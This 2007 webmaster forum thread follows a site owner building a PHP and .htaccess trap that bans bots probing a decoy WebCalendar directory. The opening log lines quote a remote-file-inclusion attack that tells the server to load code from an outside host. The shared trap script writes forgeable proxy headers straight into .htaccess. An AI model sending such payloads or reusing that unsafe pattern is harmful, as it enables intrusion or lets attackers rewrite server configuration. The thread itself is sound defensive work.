Forum Moderators: coopster

Message Too Old, No Replies

bot trap avoidance?

Is a <wbr string being used to avoid a PHP bot-trap?

         

revrob

12:02 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



I have a bot trap script set up on my site, and while checking its effectiveness I saw the following entries in my site error log.
The trap is set up in a redundant directory with fake files that I know certain "bad robots" look for, the legacy of a (now deleted) calendar that I once allowed Google to crawl. What is left "looks" like a version of WebCalendar but is in reality just a series of bot-traps, all listed in robots.txt.

[Thu Sep 27 12:19:07 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:10 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/ws
[Thu Sep 27 12:19:12 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:29 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr

In the access log for the same period and the same IP I find the equivalent entries: a clearly recognisable hack attempt aimed at my bot-trap files, but one that did not get caught by them.

202.57.69.xx - - [27/Sep/2007:12:19:07 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=25&amp;date=20070703//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:10 +0100] "GET //ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:12 +0100] "GET /WebCalendar/%3Cwbr%20//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:29 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=29&amp;date=20070719//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"

According to the access log, the files this bot was requesting (view_entry.php, get_events.php) were my bot-traps, yet the traps didn't spring and the bot's IP was not added to my .htaccess file. I know the traps are working because they trap ME if I go to them.

I suspect that it has something to do with that "<wbr" string in the error-log entry, and the equivalent "%3Cwbr%20" string in the access-log entry.

I've added this Philippines-based IP address to my ban list anyway, but I am curious as to how it avoided the trap.
Thanks in advance.

[edited by: jatar_k at 12:15 pm (utc) on Sep. 27, 2007]
[edit reason] examplified and no specific ips thanks [/edit]

PHP_Chimp

12:14 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I think you may need to post the code for the trap so that we can see what your trap is looking for.

However, there is another solution -
If this WebCalendar is in an area that humans are very unlikely to reach, why not just ban anyone looking at that area?
I have a bot trap on most of my sites. They are reached via a 1x1 clear pixel with no alt attribute, and the directory is disallowed in my robots.txt. Just in case a person actually gets to the page, the first page of the bot trap is a warning telling people to go back and not click on any of the links. If they choose to use any of the links, they are added to my blocked list.
That would save you bothering to filter the URLs to check whether they are allowed or not... just ban them all >:)
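A minimal sketch of that arrangement (the /trap/ path and the file names here are placeholders, not the actual ones): a normal page carries the invisible pixel link, and robots.txt warns compliant crawlers away from the directory:

```html
<!-- on any normal page: a link no human will see or click -->
<a href="/trap/your_last_warning.php"><img src="/images/clear.gif" width="1" height="1" /></a>
```

and in robots.txt:

```
User-agent: *
Disallow: /trap/
```

Anything that ignores robots.txt and follows an invisible link is, by definition, a bot worth blocking.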

revrob

12:27 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



Thanks for the reply. Actually this is already how the trap works: in the areas where humans don't go, anyone who does arrive and access a file gets added to .htaccess.

And I do have some links to some of the traps that humans won't use as you describe.

But these particular files are not reached by crawling; they get "direct" visits from bots that already know about them. My query is how this particular visitor managed to reach the files without springing the trap.

Basically, each fake PHP file calls a trap script (in the same directory) which writes the IP to .htaccess.

Here is the relevant section of the trap - names changed.
**********************************

<?php
include 'trap-script.php';
?>
************************************

and here is the relevant section of script
************************************
<?php
// author: seven-3-five, 2006-09-04, seven-3-five.blogspot.com
//this script is the meat and potatoes of the bot-trap
// 1. It sends you an email when the page /badbots.php is visited.
//The email contains various info about the visitor.
//2. It adds the directive
//'deny from $ip' ($ip being the visitor's ip address)
//to the bottom of your .htaccess file.

// SERVER VARIABLES USED TO IDENTIFY THE OFFENDING BOT

$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$request = $_SERVER['REQUEST_URI'];
$referer = $_SERVER['HTTP_REFERER'];


// ADD 'deny from $ip' TO THE BOTTOM OF YOUR MAIN .htaccess FILE

$text = 'deny from ' . $ip . "\n";
$file = '/var/www/vhosts/example.org.uk/httpdocs/.htaccess';

add_badbot($text, $file);

// Function add_badbot($text, $file_name): appends $text to $file_name
// make sure PHP has permission to write to $file_name

function add_badbot($text, $file_name) {
$handle = fopen($file_name, 'a');
fwrite($handle, $text);
fclose($handle);
}
****************************************
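One hedge worth adding to a script like this: appends from two simultaneous trap hits can interleave in the file. A sketch of the same append done under an exclusive lock (the function name is new, not part of the original script):

```php
<?php
// Append $text to $file_name under an exclusive lock, so two bots
// springing the trap at the same moment cannot interleave their writes.
function add_badbot_locked($text, $file_name) {
    $handle = fopen($file_name, 'a');
    if ($handle === false) {
        return false; // no write permission, or bad path
    }
    if (flock($handle, LOCK_EX)) {
        fwrite($handle, $text);
        fflush($handle);
        flock($handle, LOCK_UN);
    }
    fclose($handle);
    return true;
}
```

It is called exactly like the original add_badbot($text, $file).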

The bad guy in question was definitely aiming for those files, but he didn't get sprung. If I go for those files, the trap works - and it works for plenty of other visitors. This is the first time I have seen that <wbr string in the logs. It generates a "File does not exist" message in the error log, yet the access log shows the bot actually looking for a specific trap file. Maybe it's just a badly programmed bot that never actually located the trap - I'm new to this stuff, which is why I posted the actual log entries.

Thanks.

[edited by: eelixduppy at 12:48 pm (utc) on Sep. 27, 2007]
[edit reason] exemplified [/edit]

PHP_Chimp

12:49 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Are your error logs actually showing the IP address of the attacker with xx at the end? Or were you just being nice and not disclosing their IP address :)
Ah no, I've just looked again and seen it's been sanitised, lol

Also, was that the complete code for the bot trap? There seems to be a bit missing. If you are blocking everyone that calls the script, then it doesn't matter whether they have a referring page or not.

btw -
the <wbr> is a word-break tag. It is not often used, but it allows browsers to insert line breaks inside very long words. It is most useful in tables: if you have a very long word such as getElementByTagName in a <th>, while most of the <td>s have very short content, you can let the browser break the header by writing getElement<wbr>ByTagName.

I have seen it used to confuse other browsers/scripts, but I haven't seen it used that way in PHP. It usually turns up when people are trying to inject some code into something that shouldn't accept it... like IE with its numerous XSS exploits.
I am going to experiment with it and will report back if I manage to do anything interesting. However, as PHP doesn't parse the (X)HTML, it shouldn't take any notice of those tags.

[edited by: PHP_Chimp at 12:59 pm (utc) on Sep. 27, 2007]

revrob

1:36 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



The IPs were there in the text I pasted - I think the board software sanitised them, not me. Just add a final .130 to that IP.

The script excerpts were just that - excerpts. The files as a whole do work; I just posted the relevant bits to save on length! If you want the whole files, that's fine. I didn't get my notifying "a bad bot has just been banned" email, nor did the IP get added to .htaccess.

Everyone that hits that trap file gets automatically onto my .htaccess - because no humans or good bots should get there.

Have fun. Note that the string in the logs is <wbr and not <wbr> - I googled <wbr> and saw what it was meant to be.

Thanks

PHP_Chimp

1:37 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I am still a little confused about why you are including the code in each page that you want to block (I must need more coffee).

So here is a quick and dirty version of what I'm using -


<?php
function userIP(){
// check the common proxy headers in order, falling back to REMOTE_ADDR
// NB: these headers are client-supplied and trivially forged
$userip = $_SERVER['REMOTE_ADDR'];
$proxy_headers = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED',
    'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED');
foreach ($proxy_headers as $key){
    if (!empty($_SERVER[$key])){
        $userip = $_SERVER[$key];
        break;
    }
}
return $userip;
}


function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbot-watch@example.com\r\n";
$to = "chimp@example.com";
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}


function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}


$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/path/to/your/htaccess';
block_bot($txt, $file);
tel_me();


?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>


<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>


</body>
</html>

Call this get_lost.php and put it in the directory you are using as the bot trap.
If you know that they are looking for specific pages, you can redirect all of those requests through this script in .htaccess.

Assuming your /WebCalendar/ is the non-human-accessible directory, use the following in your .htaccess:


RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI} !^WebCalendar/get_lost.php$
RewriteCond %{REQUEST_URI} !^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the get_lost.php page and your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.

get_lost.php will block them
your_last_warning.php is the page where you can tell them not to click any other links. It is the only safe page in the directory.

Please test this first, as I have just written this out of my head so there may well be some problems with it. If there are then come back and im sure I or someone else can sort it.

[edited by: PHP_Chimp at 1:41 pm (utc) on Sep. 27, 2007]

PHP_Chimp

1:45 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Ah yes, incomplete tags ;)
XSS exploits often use them, as browsers are a little stupid (not naming IE as a good example of a very stupid browser... oops, did I name one?)
It's amazing what <img will let you get away with...

However, I don't think it will make any difference to PHP, as it doesn't parse the (X)HTML tags.

[edited by: PHP_Chimp at 1:45 pm (utc) on Sep. 27, 2007]

revrob

2:29 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



I'm doing it that way because I'm a newbie and I hadn't got as far as the sort of script you're using ;-( I just spotted the files some of the bots were after, and as I wasn't using the genuine versions of those files in that location, I copied my current trap into that location with those file names as bait.

I first discovered traps about a fortnight ago, along with .htaccess, so it's all been uphill since then. I like the look of that script - I've copied it and will try it out. I'll be back (but not for a while - I need more coffee myself!)

As for PHP - I only discovered it when I started installing things like calendars, but I don't understand a word of it - I'm just good at cutting and pasting and following instructions. (Like a computer!)

Still don't know why I didn't catch that Filipino bot in my net though!

One final question before I go off and try all this out: can a site sub-directory be given its own .htaccess file and used as a test bed for this sort of stuff?

PHP_Chimp

2:36 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Yes - an .htaccess file affects its own directory and all the directories below it. So it would be unwise to test anything new in your root-level .htaccess.
If there is a problem with it you may well get a 500 error - probably a page saying there is an error with the server and to contact the server admin. If that happens, try commenting out lines in the file and re-uploading until it works. Comments in .htaccess are single-line and start with #.
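So a sketch of a safe test bed: put the experimental directives in a subdirectory's own .htaccess (the /sandbox/ name is a placeholder), where a mistake only breaks that one directory:

```apache
# /sandbox/.htaccess - a syntax error here 500s /sandbox/ only,
# not the whole site
RewriteEngine On
# send every request under /sandbox/ to the trap script for testing
RewriteRule ^(.*)$ /trap/get_lost.php [L]
```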

If you have problems with the .htaccess, there is an Apache forum here that will sort it all out for you. Or come back, but as this is the PHP forum you may well get a faster (maybe better) answer from the Apache one.

Good luck.

revrob

4:47 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



Okay - here is what I have now done:
Created get_lost.php and your_last_warning.php, put them in the /trap/ directory, and edited them as necessary for my email address and .htaccess path.

your_last_warning.php contains a 1x1 transparent gif image link to get_lost.php, as does my main root index.html file.

robots.txt already had the /trap/ directory, so no changes were needed there. Search engines know not to go there.

I put the .htaccess fragment in place

I am assuming I do not have to actually put the traps into /WebCalendar/, but can rely on the .htaccess fragment to redirect requests for any file in that directory (including ones that aren't there) to /trap/your_last_warning.php?

The htaccess fragment you gave me is denying me access to my site and throwing up a server configuration error.
The line that kills the site is
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]

What does that line actually do?

If I comment that line out then I get access again. But I can't figure out the .htaccess combination that both allows my site to work and fires the trap when I go looking for a non-existent file in the /WebCalendar/ directory.

I'm getting error messages about max redirect limits being exceeded.

The actual trap works - if I click on the script it does what it says on the tin.

I'll shoot over to the .htaccess department!

PHP_Chimp

4:58 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Try changing it to

RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI} !^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.

The RewriteCond is a condition that the RewriteRule only applies under.
So the RewriteRule in this case sends everything - (.*) means any single character (.) repeated any number of times (*) - through to the /WebCalendar/get_lost.php page.

If the actual get_lost.php script is in a different location, you will need to change /WebCalendar/get_lost.php to point to the correct place. The [L] flag just makes sure that this is the last rule applied, so it stops the server continuing on when you want the request sent to the bot trap.

PHP_Chimp

5:02 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I put my link to that script on every page - the 1x1 image - so if a bot hits any page it gets the chance to get itself blocked.
The 1x1 image links through to your_last_warning.php. On that page there is a link that says DON'T CLICK THIS. If they click it, they actually go to a page with 40,000 made-up email addresses, in the hope that an email harvester will collect a load of random rubbish... and get banned :)

revrob

5:43 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



RewriteCond %{REQUEST_URI} ^WebCalendar/
# RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.

doesn't crash the site (but doesn't do the job of course)

RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.

DOES crash the site and gives me the error message

[Thu Sep 27 18:30:25 2007] [alert] [client my IP] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$'

Here is a visitor who was hacking away while I was testing
[Thu Sep 27 18:30:25 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/profile.php?mode=register&sid=22568d8c267ef528daf7bae8c890f9a5
[Thu Sep 27 18:30:29 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:30 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:32 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/viewforum.php?f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:34 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/phpBB//index.php?sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:38 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/index.php?sid=a52cca456ae9a3ca49174beea8c37027

Grateful for the help. I've also asked in the .htaccess forum.

[edited by: jatar_k at 7:55 pm (utc) on Sep. 27, 2007]
[edit reason] please use exampe.com and remove ips [/edit]

PHP_Chimp

7:51 pm on Sep 27, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



RewriteCond %{REQUEST_URI} !^trap/your_last_warning.php$

There needs to be a space (or more, so you can use tabs to line things up if you want) between the %{REQUEST_URI} and the !^

Let me know if that helps.

[edited by: PHP_Chimp at 7:53 pm (utc) on Sep. 27, 2007]

revrob

8:34 pm on Sep 27, 2007 (gmt 0)

10+ Year Member



OK - that extra space stops the thing crashing. But now it doesn't seem to actually do what it is supposed to.

I've got the files in place. /trap/ has both files and they work.

If I then browse to mydomain/WebCalendar/garbage.anythingyoulike
I get my error document because the file doesn't exist, but I don't get banned and my IP doesn't get written to .htaccess.

I don't get a bad bot email either.

If I go straight to the /trap/get_lost.php page manually, it does work - I get banned, and my customised 403 page displays.

So - the redirection isn't working but the trap is.

Here is what I have in .htaccess at the moment

Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]

RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI} !^trap/your_last_warning.php$
RewriteCond %{REQUEST_URI} !^trap/get_lost.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "\.php$">
order allow,deny
allow from all
# </FilesMatch>

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm

#<Files .htaccess>
#order allow,deny
#deny from all
#</Files>

#order allow,deny
deny from # long list
#allow from all

</FilesMatch>

Error messages include:

[Thu Sep 27 21:09:36 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:39 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:47 2007] [error] [client ***.142.249.9] Directory index forbidden by rule: /var/www/vhosts/mydomain/httpdocs/WebCalendar/

Thanks for sticking with this!

revrob

8:55 am on Sep 28, 2007 (gmt 0)

10+ Year Member



Okay - the guys on the Apache forum finally got this sorted. Thanks also for your tremendous help, and for the script. Here's what I ended up with.

The fragment is now:

Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]

#
RewriteCond %{REQUEST_URI} !/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI} !^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "\.php$">
order allow,deny
allow from all

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm

deny from # list of IPs

</FilesMatch>
*************************end of .htaccess

The folder being redirected is /WebCalendar/
The warning file is /trap/your_last_warning.php
The trap script is /trap/get_lost.php

The result is that a request for something like
"/WebCalendar/anyoldrubbish.whateverfiletype" now fires off the trap, sends me an email, writes the IP to .htaccess and denies access, while displaying a message for an innocent inheritor of a blocked IP to contact the webmaster.
On further attempts to access the site home page they get my customised error page which also has contact details.

All I then need to do is check .htaccess every now and then, move the added IPs into the alphabetically sorted list, and watch for oft-repeated ranges that I can lump together into a banned range rather than listing them individually.
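For the record, Apache's deny directive accepts partial addresses and CIDR ranges as well as full IPs, so the lumping-together can look like this (the addresses are examples only):

```apache
# single offender
deny from 202.57.69.130
# an entire /24 that keeps coming back
deny from 202.57.69.0/24
# partial-address form: blocks everything starting 222.122.
deny from 222.122
```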

This is exactly what I wanted. Thanks to those both here and in the Apache forum for helping me get it right! That will keep the bots chasing old WebCalendar vulnerabilities off my site for a short while!

I am very grateful.

I have a similar emailing script that puts the banned IP into the email, so I may try and work that into your emailing script. If I do I'll come back and report. Many, many thanks.

revrob

2:35 pm on Sep 28, 2007 (gmt 0)

10+ Year Member



One remaining minor issue with the bot trap (which is otherwise working fine now):

The email the script sends does not include the IP address of the intruding bot. My error logs give the following, which seems to indicate the problem:

PHP Notice: Undefined variable: bot_ip in /var/www/vhosts/mydomain/httpdocs/trap/get_lost.php on line 33

line 33 of the script reads:
msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";

The resulting bad-bot email reads (there is a blank after "address is" instead of the IP):
************************************
A bad bot hit /WebCalendar/any.file
at 2007-09-28-(Fri)-15:14:40
address is
agent is Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.7)
Gecko/20070914 Firefox/2.0.0.7
*************************************

The get_lost script is here: the $bot_ip variable works when applied to writing to .htaccess, but doesn't seem to return a result when writing the email.

*********************************
<?php
function userIP(){
// check the common proxy headers in order, falling back to REMOTE_ADDR
// NB: these headers are client-supplied and trivially forged
$userip = $_SERVER['REMOTE_ADDR'];
$proxy_headers = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED',
    'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED');
foreach ($proxy_headers as $key){
    if (!empty($_SERVER[$key])){
        $userip = $_SERVER[$key];
        break;
    }
}
return $userip;
}

function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}

function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}

$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>That was a silly thing to do!</title>
</head>

<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting yourself blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>

</body>
</html>
****************************************

Any ideas why the IP isn't getting into the email?
Many thanks.
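In case it helps anyone reading later: the notice points at PHP variable scope. $bot_ip is assigned at the top level of the script, and a variable set outside a function is not visible inside tel_me() unless it is passed in (or declared global). A sketch of the parameter version (the names follow the script above, but this is a rework, not the original author's code):

```php
<?php
// Build the alert text from explicit arguments instead of relying on a
// global $bot_ip, which is out of scope inside a function.
function build_alert($bot_ip, $uri, $agent) {
    $day = date("Y-m-d-(D)-H:i:s", time());
    $msg  = "A bad bot hit " . $uri . "\nat " . $day . " \n";
    $msg .= "address is " . $bot_ip . "\nagent is " . $agent . "\n";
    return wordwrap($msg, 70);
}

// tel_me() now takes the IP as a parameter...
function tel_me($bot_ip) {
    $to = "badbots@example.com"; // edit for the right email address
    $msg = build_alert($bot_ip, $_SERVER['REQUEST_URI'], $_SERVER['HTTP_USER_AGENT']);
    mail($to, "Alert: bad robot", $msg, "From: badbots@example.com\r\n");
}

// ...and the bottom of the script passes it in:
// $bot_ip = userIP();
// block_bot("deny from $bot_ip\n", $file);
// tel_me($bot_ip);
```

The .htaccess write works in the original because that $bot_ip use happens at the top level, in the same scope where it was assigned.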

revrob

5:10 pm on Sep 28, 2007 (gmt 0)

10+ Year Member



For anyone interested, the discussion about my trap as it relates to the .htaccess code is in this thread here
[webmasterworld.com...]

revrob

3:31 pm on Sep 29, 2007 (gmt 0)

10+ Year Member



Can anyone please help me get this script to put its "deny from IP" line INSIDE the .htaccess <FilesMatch> container rather than outside (where it behaves a bit erratically in my setup)?

All suggestions gratefully received!

Script: called get_lost.php - it is accompanied by a warning page called your_last_warning.php (see the .htaccess file).

<?php
function userIP(){
// check the common proxy headers in order, falling back to REMOTE_ADDR
// NB: these headers are client-supplied and trivially forged
$userip = $_SERVER['REMOTE_ADDR'];
$proxy_headers = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED',
    'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED');
foreach ($proxy_headers as $key){
    if (!empty($_SERVER[$key])){
        $userip = $_SERVER[$key];
        break;
    }
}
return $userip;
}

function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}

function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}

$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>

<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting yourself blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>If you have no idea why you have been banned then it may be that you have inherited an IP (Internet Protocol) address from someone who previously used it to try and hack our site. In which case please feel free to email our webmaster and give him your present IP address and ask for it to be unbanned. Sorry for the inconvenience! If you don't know what your IP address is right now, then open another browser window or tab and go to [whatismyip.com...] and it will be displayed on the screen. Then copy and paste it into an email to webmaster AT mydomain and we'll look into it.</p>
<p>Bye</p>

</body>
</html>

.htaccess file:

Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
#
RewriteCond %{REQUEST_URI} !/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI} !/trap/get_lost\.php$
RewriteCond %{REQUEST_URI} !^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "\.php$">
order allow,deny
allow from all

ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm

deny from # list of IPs
</FilesMatch>

PHP_Chimp

7:40 pm on Oct 1, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



The problem is that if you require the ending </FilesMatch>, it becomes difficult to append the code to the end of the file. For my personal use I get the email and then choose how I am going to block the bot. Some bots have user-agent strings that are easy to block, and that stops your .htaccess file having thousands of lines that all come from the same host - e.g. on one of my sites I block the entire 38.#*$!x block, as I had so many problems with people/bots from that area.

However, below is a bit of modified code that will write what you want directly into your .htaccess.

Change the text that gets written to $t = "\ndeny from $bot_ip\n</FilesMatch>"; and use:


function block_bot($t, $f){
$size = filesize($f);
$s = $size - 14; // "</FilesMatch>" plus its trailing newline == 14 bytes
$fh = fopen($f, 'r+b'); // open in binary mode just in case
fseek($fh, $s); // back up over the closing tag so the write replaces it
fwrite($fh, $t);
fclose($fh);
}

Although this works, you may want to think about blocking people manually, as a lot of IPs are dynamic: if you block one, the bot renews its connection, gets another address, and gets blocked again. Each added line makes the .htaccess file larger, and since the server reads this file before anything else is processed, a 20k .htaccess effectively adds 20k of overhead to every request, so the site gets slower. Blocking by user agent can be very effective; block by IP when there is no other solution.
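A sketch of the user-agent route with mod_setenvif, using the libwww-perl string from the logs earlier in the thread (test on a sandbox first):

```apache
# flag any request whose User-Agent contains "libwww-perl"...
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot
# ...then deny flagged requests while allowing everyone else
order allow,deny
allow from all
deny from env=bad_bot
```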
I guess that I should have pointed that out at the beginning, but I wasn't concentrating on the end result...just fixing the script...will try harder next time ;)
